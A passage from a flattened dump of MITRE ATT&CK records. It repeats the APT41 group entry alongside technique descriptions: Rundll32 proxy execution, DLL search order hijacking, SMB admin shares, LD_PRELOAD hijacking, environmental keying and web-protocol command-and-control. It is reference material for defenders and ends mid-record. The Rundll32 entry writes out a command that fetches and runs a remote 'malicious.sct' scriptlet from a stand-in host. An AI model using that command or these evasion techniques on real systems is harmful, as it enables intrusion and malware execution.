description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--898211c4-915c-469f-be47-321d2d44af90
revoked : False
technique : Rundll32
technique_description : Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.011
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Metadata', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06
revoked : False
technique : DLL Search Order Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--39808511-28ac-4cff-b6b4-49d996855e8a
revoked : False
technique : SMB/Windows Admin Shares
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Share: Network Share Access', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)	
relationship_id : relationship--7f9fe6d5-79ba-44ca-bf19-c980e5c2fc11
revoked : False
technique : Dynamic Linker Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.006
matrix : mitre-attack
platform : ['Linux', 'macOS']
data_sources : ['File: File Creation', 'Command: Command Execution', 'Module: Module Load', 'Process: Process Creation', 'File: File Modification']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)
relationship_id : relationship--5212a108-111b-4467-84c9-933d2b84aad2
revoked : False
technique : Environmental Keying
technique_description : Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1480.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) 
relationship_id : relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150
revoked : False
technique : Web Protocols
technique_description : Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 